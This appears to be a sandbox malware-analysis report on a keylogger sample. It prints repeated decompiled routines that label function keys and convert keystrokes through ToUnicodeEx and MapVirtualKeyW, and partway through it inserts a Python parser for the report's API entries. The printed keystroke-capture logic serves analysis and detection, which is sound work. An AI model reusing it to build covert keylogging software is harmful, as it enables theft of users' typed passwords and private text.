                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F24]
                  • API String ID: 783433895-1944718003
                  • Opcode ID: 665d1b7efd069a3ae324f5ec22a3b3878916ac6c883f3f9a389a2f470a77c692
                  • Instruction ID: c4be0e32e04de120a2cca3183412b642890461deb7d46080007a753c2659c191
                  • Opcode Fuzzy Hash: 665d1b7efd069a3ae324f5ec22a3b3878916ac6c883f3f9a389a2f470a77c692
                  • Instruction Fuzzy Hash: 7C31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE49CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100074B9(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F3]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}















                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F3]
                  • API String ID: 783433895-335784001
                  • Opcode ID: 80c9ce260dae226eb44177270cdbf564c4ea894a5715ee9831f10be66ef7018d
                  • Instruction ID: 5ffa793185ddc03e6bd9b518dcc1c3a840d5d258ef7404ebf5977b295413e047
                  • Opcode Fuzzy Hash: 80c9ce260dae226eb44177270cdbf564c4ea894a5715ee9831f10be66ef7018d
                  • Instruction Fuzzy Hash: 3031BEB8B042545BF722CB658C45B9F73A9FB882C0F50C0A5F6489720ECA78EE458B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100074CA(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F4]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}















                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F4]
                  • API String ID: 783433895-1531068038
                  • Opcode ID: 6d9a0e9fbebd9a50c8bcb9db2712b1e2ac49f4d56deef2cfada9a671fa5fc202
                  • Instruction ID: 257b764002efa9c4341bee291622735cee0b2dcf4ecee3ad542065e968f39148
                  • Opcode Fuzzy Hash: 6d9a0e9fbebd9a50c8bcb9db2712b1e2ac49f4d56deef2cfada9a671fa5fc202
                  • Instruction Fuzzy Hash: 5D31C0B8F042545BF722CB658C85B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100074DB(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F5]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}















                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F5]
                  • API String ID: 783433895-1113132999
                  • Opcode ID: f81663136670eefa6b559e0c3c47de8a84feb9d0a987ea63e8a80dbafee9e838
                  • Instruction ID: e633cb04462a412f5613c9ae028300c402083a262aa70dec723c73e3e1fc98dc
                  • Opcode Fuzzy Hash: f81663136670eefa6b559e0c3c47de8a84feb9d0a987ea63e8a80dbafee9e838
                  • Instruction Fuzzy Hash: 8131C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100074EC(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F6]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}















                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F6]
                  • API String ID: 783433895-1769233412
                  • Opcode ID: de0a920129dad26d8c4fe0b58c73f8f855b5dba485b07b544234d7fa5c6e68d1
                  • Instruction ID: 06c9bff7c49a7ca2c2341c9269cfae46da6e7e947720c8e577cceb00dd52d8a3
                  • Opcode Fuzzy Hash: de0a920129dad26d8c4fe0b58c73f8f855b5dba485b07b544234d7fa5c6e68d1
                  • Instruction Fuzzy Hash: 9F31C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100074FD(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F7]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  Line addresses (collapsed from the side column): the append of the "[F7]" label is at 0x100074fd to 0x10007504; every following line lies in 0x100076f0 to 0x100078b6, the body shared by the neighbouring key-label routines.

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
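The API entries in this report follow one fixed layout across the thousands of decompile blocks, so extracting them programmatically is the quickest way to see where the sample calls the keyboard-translation APIs and with which constants. The parser below is an added example written for this page; it is not Joe Sandbox output and not code from the sample. It assumes only the entry format visible above (the bullet, the optional "Part of subcall function" prefix, hex arguments with "?" for values the analyzer could not resolve, and the "ref:" call-site address). The constant names are taken from the Win32 headers: 0x6E is VK_DECIMAL, and MapVirtualKeyW uMapType 1 is MAPVK_VSC_TO_VK.

```python
"""Parser for the 'APIs' entries in a Joe Sandbox decompile block.

Added example for working with this report; it is neither sandbox output
nor code from the sample. The entry format is copied from the listing
above. '?' marks an argument the analyzer could not resolve.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Win32 constants for the values that are fixed in the entries on this page.
VK_NAMES = {0x6E: "VK_DECIMAL"}
MAPVK_NAMES = {0: "MAPVK_VK_TO_VSC", 1: "MAPVK_VSC_TO_VK",
               2: "MAPVK_VK_TO_CHAR", 3: "MAPVK_VSC_TO_VK_EX"}

_ENTRY = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[Optional[int], ...]   # None where the report shows '?'
    ref: int                          # address of the call site
    subcall_of: Optional[int]         # callee address for inherited entries


def parse_args(text: str) -> Tuple[Optional[int], ...]:
    """'0000006E,?,00000001' -> (0x6E, None, 1)."""
    out = []
    for item in text.split(","):
        item = item.strip()
        if item:
            out.append(None if item == "?" else int(item, 16))
    return tuple(out)


def parse_entry(line: str) -> Optional[ApiCall]:
    m = _ENTRY.match(line)
    if m is None:
        return None
    return ApiCall(api=m["api"], module=m["module"], args=parse_args(m["args"]),
                   ref=int(m["ref"], 16),
                   subcall_of=int(m["sub"], 16) if m["sub"] else None)


def parse_block(text: str) -> List[ApiCall]:
    """Keep only the lines that are API entries; headers such as 'APIs' are skipped."""
    return [c for c in map(parse_entry, text.splitlines()) if c is not None]


def by_api(calls: List[ApiCall]) -> Dict[str, List[int]]:
    """Distinct call sites per API, sorted, so repeated decompile blocks collapse."""
    sites: Dict[str, set] = {}
    for c in calls:
        sites.setdefault(c.api, set()).add(c.ref)
    return {api: sorted(refs) for api, refs in sites.items()}


def annotate(call: ApiCall) -> List[str]:
    """Name the constants a keyboard-translation call passes, where they are resolved."""
    notes: List[str] = []
    if call.api == "MapVirtualKeyW" and len(call.args) == 2:
        code, maptype = call.args
        if code is not None:
            notes.append(f"uCode=0x{code:02X}")
        if maptype in MAPVK_NAMES:
            notes.append(f"uMapType={MAPVK_NAMES[maptype]}")
    elif call.api == "ToUnicodeEx" and len(call.args) == 7:
        vk, _scan, _state, _buf, cch, flags, _hkl = call.args
        if vk in VK_NAMES:
            notes.append(f"wVirtKey={VK_NAMES[vk]}")
        if cch is not None:
            notes.append(f"cchBuff={cch}")
        if flags is not None:
            notes.append(f"wFlags={flags}")
    return notes


# The six entries of the block above, copied verbatim from the report.
SAMPLE_BLOCK = """\
APIs
  • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
• ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
• ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
• MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
• MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
• ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
"""

if __name__ == "__main__":
    for call in parse_block(SAMPLE_BLOCK):
        print(f"{call.ref:08X} {call.module}!{call.api} {annotate(call)}")
```

Run as a script it lists each call site with its named constants. One detail the annotation surfaces: MapVirtualKeyW is called with uMapType 1 (MAPVK_VSC_TO_VK), which makes the API treat 0x6E as a scan code, while the same 0x6E is handed to ToUnicodeEx as the virtual key (VK_DECIMAL) in the do/while loop that repeats until ToUnicodeEx stops returning a negative, dead-key result.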
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F7]
                  • API String ID: 783433895-1886350661
                  • Opcode ID: 345da217220ec433c981a36fa361fc3ad81173d5edecf30b3bf0f3c1a6518443
                  • Instruction ID: 73602d54f96144a7c61c9f0aea61f9d03e1029ed712db4d82cb90836cee0ee4d
                  • Opcode Fuzzy Hash: 345da217220ec433c981a36fa361fc3ad81173d5edecf30b3bf0f3c1a6518443
                  • Instruction Fuzzy Hash: 7E31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E1000750E(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F8]");
                  				E10003A34( *__ebx, 0);
